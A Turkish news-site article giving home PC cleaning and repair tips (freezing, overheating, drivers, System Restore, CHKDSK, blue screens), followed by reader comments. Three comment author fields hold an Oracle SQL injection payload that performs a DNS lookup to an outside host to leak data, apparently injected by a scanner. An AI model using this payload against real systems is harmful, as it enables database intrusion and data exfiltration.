Bilgisayar nasıl temizlenir? Tamiri nasıl yapılır?

Hayatımızın değişmez parçası haline gelen bilgisayarlar nasıl temizlenir? Tamiri nasıl yapılır? Bir bilgisayarın entegre bileşenleri herhangi bir anormallikte performansa zarar verebilir ancak bazı genel sorunları kişisel düzeyde giderebiliriz. Etkili bilgisayar onarım ipuçları ve bunları uygulayacak birkaç hile mevcut.
25 Haziran 2014 11:55
Bilgisayar nasıl temizlenir? Tamiri nasıl yapılır?

Bilgisayar onarımının önemi bizim kişisel bilgilerimizi içerdiği için büyük önem arz etmekte. Bazı sorunlar karmaşık iken bazıları ise oldukça basittir. Size vereceğimiz birkaç ipucu ile kendi sisteminizi onarabilirsiniz.

 

Bilgisayarınızın Donması

Bilgisayarınız herhangi bir donanım veya yazılım sorunu nedeniyle donabilir, işte bunun arkasındaki esas nedeni bilmek gerekir. Eğer bir yazıcı ya da tarayıcı gibi herhangi bir donanım aygıtları bağlıyken sorun başlamış ise dikkat edin; sürücü çatışması yüzünden sorun oluşmuş olabilir. Yeni bir sabit disk montajı sonrası oluşmuşsa o zaman yetersiz güç ya da çok fazla ısı nedeniyle oluşmuş olabilir. Bu gibi sorunları ortadan kaldırmak için aşağıdaki adımları izleyebilirsiniz.

 

1-Bilgisayarınızı dinlenmeye bırakın

 

 

Eğer her zaman bilgisayarınızı açık bırakıyorsanız, sık sık fişini en az 30 saniyeliğine çıkarıp tekrar takarak bu sorunu çözebilirsiniz. Böylece donanım ve hafıza temizlenmiş olur.

 

2-Bilgisayarınızın çok ısınıp ısınmadığına bakın

 

 

Bunun için göz içini açmanız gerekir. Şunu unutmayın ki bilgisayarınızın kasasını açmadan önce bilgisayarınızı kapatmanız gerekir. Uzun saçlarınız varsa sırtınıza doğru atın, iletken takılarınız varsa çıkarın. Herhangi bir kıvılcım da hem kendinize hem de donanıma zarar verebilirsiniz.

 

3-Bilgisayarınızın kapağını açın ve metal kasanın sıcaklığını kontrol edin

 

 

Eğer sıcaksa kesinlikle bazı termal sorunlarınız var demektir. Yavaşça ön ve arka fanları inceleyip tozları alınabilir, gizli partikülleri de temizleyebilirsiniz. Bu temizleme işlemi sırasında fiber bez kullanmanızı öneririz. Unutmayın: Tüm bu işlemler için bilgisayarınız kapalı olmak zorunda.

·         Bilgisayarınızda birden fazla sabit disk varsa bunları yanyana sağa eğimli takmaktan kaçının. Isı sebebiyle eğrilebilirler. Geniş bir yuvaya ekstra bir sabitdisk takmak için, CD-ROM veya DCD-ROM sürücüsü gibi, herhangi bir bilgisayar parçaları satan bir mağazadan montaj dirsekleri satın alabilirsiniz.

 

 

·         Bilgisayarınızın sorunu olmasa dahi düzenli olarak fanlarınızı temizlemeniz gerekir.

 

 

·         Tüm bunlardan sonra kasayı kapatmadan önce mutlaka tüm kabloları ve tüm parçaların takılı olduğunu kontrol edin ve anakarta baskı uygulamaktan kaçının.

 

 

4-Aygıt Sürücülerini kontrol edin

 

 

Windows Güncellemeleri sırasında birçok bilgisayarda donma olabilir ve bunun sebebi yanlış bir sürücü indirmek ya da yüklemek olabilir. Aygıt Yöneticisi üzerinden bu durumu kontrol edebilirsiniz. Bu sırada varsa takılı USB, çıkarın. Güncelleme ve bir sürücü indirip yükleme işleminizden sonra bilgisayarınızı yeniden başlatın ve normal çalışıyorsa bir sorun yoktur. Ancak normal çalışmıyorsa Sistem Geri Yükleme üzerinden yüklediklerinizi geri alabilirsiniz.

 

5-Sistem Geri Yükleme

 

 

Şu şekilde ulaşabilirsiniz:

Başlat – Tüm programlar – Donatılar – Sistem Araçları – Sistem Geri Yükleme

 

6-Hard Diskinizi kontrol edin

 

Hard disk sizin bilgi deponuzdur ve uzun süredir kullanılan hard disk zarar görmüş ve darmadağın durumda olabilir ve bu da bilgisayarınızın performansını yavaşlatır. Bu nedenle düzenli olarak düzenli olarak kötü yazılımları taramak ve kaldırmak için Windows yardımcı CHKDSK kullanın. Bu bilgisayarın sağlığını korumak için en iyi yollardan biridir.

Mavi Ekran Sorunu

 

 

Bilgisayarınızdaki uygulama yazılımı veya işletim sistemindeki boşluklar yüzünden bilgisayarınız herhangi bir erişim veya yükü reddediyor olabilir. Bu programları ortadan kaldırmak ve bilgisayarınızı düzeltmek ve uyumlu bir anti-virüs programı indirebilirsiniz.

·         Kayıt Defteri Hataları

Windows Kayıt Defteri bilgisayarınızda donanım ve yazılım ayarları ile ilgili bilgileri tutar. Kötü niyetli bir program kayıtları bozarsa mavi ekranla karşılaşabilirsiniz. Bu sorunlar doğrudan kayıt defteri üzerinden düzenlenir. Bu problemler kayıt defteri üzerinden elle veya üçüncü parti yazılımlar ile düzeltilebilir. Daima kayıt defterini düzenlemek ile uğraşmak istemiyorsanız kayıt defterini yedekleyebilirsiniz.

Çeviri: incehesap

865527
'||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('bikuxjpichcasr0qqkwozdw9-wo7j3qkvojqvl8m'||'roq.r87.me') from DUAL))||'
18 Mart 2017, Cumartesi 17:00
ekran açılmıyor ne yapabilirim
Cevaplar:
'||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('bikuxjpichcasr0qqkwozdw9-wo7j3qkvojqvl8m'||'roq.r87.me') from DUAL))||'
20 Kasım 2017, Pazartesi 16:43
AÇMA O ZAMAN
'||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('bikuxjpichcasr0qqkwozdw9-wo7j3qkvojqvl8m'||'roq.r87.me') from DUAL))||'
18 Mart 2017, Cumartesi 10:49
bilgisayarın ekranı açılmıyor ne yapabilirim
Bu haberler ilginizi çekebilir